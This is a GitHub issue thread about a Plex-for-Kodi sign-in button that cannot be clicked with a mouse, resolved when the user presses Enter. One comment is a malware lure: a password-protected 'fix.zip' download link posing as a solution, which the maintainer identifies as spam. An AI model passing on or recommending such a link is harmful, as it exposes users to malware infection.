### ISSUE TITLE
Can't sign in to Plex post install

### ISSUE THREAD

**Issue by jdhearn** [pannal/plex-for-kodi#140]
## Description: After install on the latest version of Kodi (Omega), when I open the Plex app, the option to sign in is present, but I cannot click on it, it's as though it is a dead button.
Has anyone else had this before? How do I sign into my plex server?

## Details:
- Add-on version: Latest
- Kodi version: Omega
- OS Platform: Windows 10 Pro 64 bit
- Hardware: HP elitedesk 800 g5 mini

## Checklist
- [ ] I have included a link to a log (or at the very least a link to a forum post with a log) from a session that had the issue
- [ ] I have added appropriate GitHub labels

**Comment by pannal** [comment]
Pressing enter does nothing? Please attach logs.

Also, which resolution does kodi run at? Standard 16:9 or windowed?

**Comment by pannal** [comment]
Does rolling back to 0.7.8 fix this?

**Comment by jdhearn** [comment]
Thanks for the reply.  I only have a mouse attached, so not tried pressing enter - I'll attach a keyboard and try it, just so we can eliminate.  Kodi runs full screen in 720p.  I can also try rolling back to a different version.  Once attempted, I'll report back.  Thanks.

**Comment by LC-JiaZhaorong** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by jdhearn** [comment]
OK will do - what is that download, is it an addon for Kodi?

**Comment by pannal** [comment]
What do you mean?

**Comment by jdhearn** [comment]
I mean the download that LC-JiaZhaorong suggested above, I was asking what it was being suggested to download?

**Comment by pannal** [comment]
That's a spam bot distributing Malware. Ignore it and report it

**Comment by jdhearn** [comment]
Oh OK, thanks - did look a little weird

**Comment by jdhearn** [comment]
So, added on a keyboard and hit enter and it worked, I was able to sign into my plex server.  Ah, the simple solutions - good, but frustrating that I didn't try that initially!!!
Thanks for your help, all working and looks good.

**Comment by pannal** [comment]
Yeah, still a valid bug, though. The sign in should be possible with a mouse only.
